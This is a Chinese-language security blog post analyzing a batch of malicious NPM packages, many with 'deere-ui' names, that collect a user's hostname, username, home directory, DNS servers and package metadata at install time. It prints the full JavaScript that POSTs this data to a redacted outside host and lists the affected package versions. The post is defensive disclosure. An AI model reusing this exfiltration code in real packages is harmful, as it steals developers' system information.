一、事件简述:
7 月 16 日 ,OSCS 安全社区监测到shaikhyaser一天内在NPM仓库中不间断投放了十多个组件包,这些组件包都包含恶意行为。截止到21日,该用户已向 NPM 仓库投放了 67个不同版本的的恶意组件包,这些包也在代码中注明了该用户的邮箱,推测是hackerone中的用户。
这些恶意包的攻击方式相同,下面来分析其攻击手法。
二、 手法分析
当安装这些组件包时,用户信息的敏感信息会被发送到恶意地址。
//author:- shaikhyaser@wearehackerone.com
const os = require("os");
const dns = require("dns");
const querystring = require("querystring");
const https = require("https");
const packageJSON = require("./package.json");
const package = packageJSON.name;
const trackingData = JSON.stringify({
p: package,
c: __dirname,
hd: os.homedir(),
hn: os.hostname(),
un: os.userInfo().username,
dns: dns.getServers(),
r: packageJSON ? packageJSON.___resolved : undefined,
v: packageJSON.version,
pjson: packageJSON,
});
var postData = querystring.stringify({
msg: trackingData,
});
var options = {
hostname: "<恶意地址!!!!>",
port: 443,
path: "/",
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": postData.length,
},
};
var req = https.request(options, (res) => {
res.on("data", (d) => {
process.stdout.write(d);
});
});
req.on("error", (e) => {
// console.error(e);
});
req.write(postData);
req.end();index.js
会被泄露的敏感信息主要如下(以较为敏感的为例子)
un: os.userInfo().username获取当前用户名hn: os.hostname()获取当前主机名dns: dns.getServers()获取当前服务器 IP 地址
这个组件包通常都在用户安装过程中获取敏感信息,并不直接对用户造成危害,目前没有进一步行为,未来可能在这些信息收集到一定程度时会有进一步动作,例如针对性投放挖矿软件或是后门木马。
三、总结
近期类似的投放恶意包事件越来越多,OSCS监测发现,在过去的五天里发现了107个恶意组件。
- 88%为尝试获取主机敏感信息(尝试获取主机名、主机 IP 等)
- 12%为非预期网络访问,并无直接危害(安装过程中自动请求远程服务地址)
7.18-7.22 投毒事件统计
四、附录
恶意组件包名及版本具体如下:
eslint-config-cap-it-ui@0.0.0
deere-ui-domain-framework-mixins@0.0.0
deere-ui-asset-events@0.0.0
equipment-color@0.0.0
deere-map-features@0.0.0
deere-ui-icons@0.0.0
deere-ui-basic-dialog@0.0.0
deere-ui-domain-framework@0.0.0
deere-ui-framework@0.0.0
deere-ui-branding-ag@0.0.0
deere-ui-modal-core@0.0.0
deere-ui-multiselect@0.0.0
deere-ui-loader@0.0.0
competitive-equipment-icon@0.0.0
shaikh-test@1.0.0
shaikh-test@1.0.1
shaikh-test@1.0.2
shaikh-test@1.0.3
shaikh-test@1.0.4
shaikh-test@1.0.5
shaikh-test@1.0.6
shaikh-test@1.0.7
shaikh-test@1.0.8
shaikh-test@1.0.9
shaikh-test@1.0.10
shaikh-test@1.0.11
shaikh-test@1.0.12
shaikh-test@1.0.13
shaikh-test@1.0.14
shaikh-test@1.0.15
shaikh-test@1.0.16
shaikh-test@1.0.17
shaikh-test@1.0.18
shaikh-test@1.0.20
shaikh-test@1.0.21
shaikh-test@1.0.22
shaikh-test@1.0.23
shaikh-test@1.0.24
shaikh-test@1.0.25
deere-ui-domain-framework-mixins@1.0.0
deere-ui-asset-events@0.0.1
equipment-color@0.0.1
deere-map-features@0.0.1
deere-ui-basic-dialog@0.0.1
deere-ui-domain-framework@0.0.1
deere-ui-branding-ag@0.0.1
deere-ui-modal-core@0.0.1
deere-ui-multiselect@0.0.1
deere-ui-loader@0.0.1
competitive-equipment-icon@0.0.1
eslint-config-cap-it-ui@8.1.1
machine-mapper@4.1.1
deere-ui-domain-framework-mixins@1.1.2
deere-ui-asset-events@1.0.0
equipment-color@1.0.0
deere-map-features@1.0.0
deere-ui-icons@1.0.0
deere-ui-basic-dialog@1.0.0
deere-ui-domain-framework@1.0.0
deere-ui-framework@1.0.0
deere-ui-branding-ag@1.0.0
deere-ui-modal-core@1.0.0
deere-ui-multiselect@1.0.0
deere-ui-loader@1.0.0
competitive-equipment-icon@1.0.0
machine-mapper@1.0.0
deere-ui-toggle-group@1.0.0发布者:墨菲安全,转发请注明出处:https://www.murphysec.com/blog/poisoning-analysis/4353.html
